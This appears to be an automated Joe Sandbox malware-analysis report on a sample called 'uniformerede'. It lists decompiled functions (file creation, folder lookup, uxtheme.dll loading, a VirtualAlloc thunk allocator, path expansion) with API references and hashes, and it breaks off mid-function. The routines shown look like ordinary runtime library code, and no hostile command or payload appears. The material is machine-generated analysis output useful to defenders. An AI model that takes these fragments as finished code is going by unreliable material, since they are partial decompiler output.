                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,?,00418E54,00000001), ref: 00409939
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00409F54(void* __eax) {
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				return _t4 + 1;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,0047638B), ref: 00409F61
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4241100979-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045D2F8(signed int __eax, void* __ecx) {
                                                                                                                                                                                                                            				struct _ITEMIDLIST** _t10;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
                                                                                                                                                                                                                            				return  *_t10;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FolderLocationSpecial
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3328827890-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A7C(void* __eax) {
                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = GetFileAttributesA(E00404E80(__eax)); // executed
                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00435634(void* __eax) {
                                                                                                                                                                                                                            				int _t3;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *((char*)(__eax + 0x10)) = 3;
                                                                                                                                                                                                                            				_t3 = WinHelpA(0, 0x43564c, 2, 0); // executed
                                                                                                                                                                                                                            				return _t3;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            0x00435634
                                                                                                                                                                                                                            0x00435643
                                                                                                                                                                                                                            0x00435648

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Help
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2830496658-0
                                                                                                                                                                                                                            • Opcode ID: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                                                                                                                                                                                            • Instruction ID: 79a91a3f31a143df2f0efbcac983927cafc7536058e87a69d5408432099ce831
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8B011C0BC8380BAFA2222288C0BF080C002B00F08FE000CAB2083C0C302ECA200002E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00422BCC(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				char* _t26;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49e88c == 0) {
                                                                                                                                                                                                                            					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                                                                                                                                                                                                            					_t35 = _t14;
                                                                                                                                                                                                                            					 *_t35 =  *0x49e888;
                                                                                                                                                                                                                            					_t1 = _t35 + 4; // 0x4
                                                                                                                                                                                                                            					E004029DC(0x49b5c8, 2, _t1);
                                                                                                                                                                                                                            					_t2 = _t35 + 5; // 0x5
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t35 + 6)) = E00422BC4(_t2, E00422BA4);
                                                                                                                                                                                                                            					_t4 = _t35 + 0xa; // 0xa
                                                                                                                                                                                                                            					_t26 = _t4;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *_t26 = 0xe8;
                                                                                                                                                                                                                            						_t5 = _t35 + 4; // 0x4
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t26 + 1)) = E00422BC4(_t26, _t5);
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t26 + 5)) =  *0x49e88c;
                                                                                                                                                                                                                            						 *0x49e88c = _t26;
                                                                                                                                                                                                                            						_t26 = _t26 + 0xd;
                                                                                                                                                                                                                            					} while (_t26 - _t35 < 0xffc);
                                                                                                                                                                                                                            					 *0x49e888 = _t35;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t25 =  *0x49e88c;
                                                                                                                                                                                                                            				 *0x49e88c =  *((intOrPtr*)(_t25 + 5));
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                                                                                                                                                                                            				return  *0x49e88c;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E0042E3B4(void* __ebx, void* __ecx) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				intOrPtr _t2;
                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 =  *0x49ea48; // 0x2210dc8
                                                                                                                                                                                                                            				E0042E1AC(_t2);
                                                                                                                                                                                                                            				_push(_t111);
                                                                                                                                                                                                                            				_push(0x42e767);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t111;
                                                                                                                                                                                                                            				 *0x49ea44 =  *0x49ea44 + 1;
                                                                                                                                                                                                                            				if( *0x49ea40 == 0) {
                                                                                                                                                                                                                            					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
                                                                                                                                                                                                                            					if( *0x49ea40 > 0) {
                                                                                                                                                                                                                            						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
                                                                                                                                                                                                                            						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
                                                                                                                                                                                                                            						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
                                                                                                                                                                                                                            						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
                                                                                                                                                                                                                            						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                                                                                                                                                                                            						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                                                                                                                                                                                            						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
                                                                                                                                                                                                                            						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
                                                                                                                                                                                                                            						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
                                                                                                                                                                                                                            						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
                                                                                                                                                                                                                            						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
                                                                                                                                                                                                                            						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
                                                                                                                                                                                                                            						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
                                                                                                                                                                                                                            						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
                                                                                                                                                                                                                            						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
                                                                                                                                                                                                                            						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
                                                                                                                                                                                                                            						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
                                                                                                                                                                                                                            						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
                                                                                                                                                                                                                            						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
                                                                                                                                                                                                                            						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
                                                                                                                                                                                                                            						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
                                                                                                                                                                                                                            						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
                                                                                                                                                                                                                            						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
                                                                                                                                                                                                                            						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
                                                                                                                                                                                                                            						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
                                                                                                                                                                                                                            						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
                                                                                                                                                                                                                            						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
                                                                                                                                                                                                                            						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
                                                                                                                                                                                                                            						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
                                                                                                                                                                                                                            						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
                                                                                                                                                                                                                            						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
                                                                                                                                                                                                                            						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
                                                                                                                                                                                                                            						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
                                                                                                                                                                                                                            						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
                                                                                                                                                                                                                            						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
                                                                                                                                                                                                                            						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
                                                                                                                                                                                                                            						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
                                                                                                                                                                                                                            						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
                                                                                                                                                                                                                            						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
                                                                                                                                                                                                                            						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
                                                                                                                                                                                                                            						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
                                                                                                                                                                                                                            						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
                                                                                                                                                                                                                            						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
                                                                                                                                                                                                                            						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
                                                                                                                                                                                                                            						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
                                                                                                                                                                                                                            						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
                                                                                                                                                                                                                            						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 =  *0x49ea40 > 0;
                                                                                                                                                                                                                            				_pop(_t108);
                                                                                                                                                                                                                            				 *[fs:eax] = _t108;
                                                                                                                                                                                                                            				_push(0x42e76e);
                                                                                                                                                                                                                            				_t6 =  *0x49ea48; // 0x2210dc8
                                                                                                                                                                                                                            				return E0042E1B4(_t6);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                                                            • API String ID: 2238633743-2910565190
                                                                                                                                                                                                                            • Opcode ID: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                                                                                                                                                                                            • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00406018(char* __eax, intOrPtr __edx) {
                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v334;
                                                                                                                                                                                                                            				char _v595;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				char* _t54;
                                                                                                                                                                                                                            				char* _t64;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                            				char* _t90;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t91;
                                                                                                                                                                                                                            				char* _t93;
                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                            				char* _t95;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_v16 = _v8;
                                                                                                                                                                                                                            				_t91 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                            				if(_t91 == 0) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					if( *_v8 != 0x5c) {
                                                                                                                                                                                                                            						_t93 = _v8 + 2;
                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                                                                                                                                                                            							_t95 = E00406004(_v8 + 2);
                                                                                                                                                                                                                            							if( *_t95 != 0) {
                                                                                                                                                                                                                            								_t14 = _t95 + 1; // 0x1
                                                                                                                                                                                                                            								_t93 = E00406004(_t14);
                                                                                                                                                                                                                            								if( *_t93 != 0) {
                                                                                                                                                                                                                            									L10:
                                                                                                                                                                                                                            									_t83 = _t93 - _v8;
                                                                                                                                                                                                                            									_push(_t83 + 1);
                                                                                                                                                                                                                            									_push(_v8);
                                                                                                                                                                                                                            									_push( &_v595);
                                                                                                                                                                                                                            									L0040131C();
                                                                                                                                                                                                                            									while( *_t93 != 0) {
                                                                                                                                                                                                                            										_t90 = E00406004(_t93 + 1);
                                                                                                                                                                                                                            										_t45 = _t90 - _t93;
                                                                                                                                                                                                                            										if(_t45 + _t83 + 1 <= 0x105) {
                                                                                                                                                                                                                            											_push(_t45 + 1);
                                                                                                                                                                                                                            											_push(_t93);
                                                                                                                                                                                                                            											_push( &(( &_v595)[_t83]));
                                                                                                                                                                                                                            											L0040131C();
                                                                                                                                                                                                                            											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                                                                                                                                                                            											if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                            												FindClose(_t94);
                                                                                                                                                                                                                            												_t54 =  &(_v334.cFileName);
                                                                                                                                                                                                                            												_push(_t54);
                                                                                                                                                                                                                            												L00401324();
                                                                                                                                                                                                                            												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                                                                                                                                                                            													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                                                                                                                                                                            													_push(0x105 - _t83 - 1);
                                                                                                                                                                                                                            													_push( &(_v334.cFileName));
                                                                                                                                                                                                                            													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                                                                                                                                                                            													L0040131C();
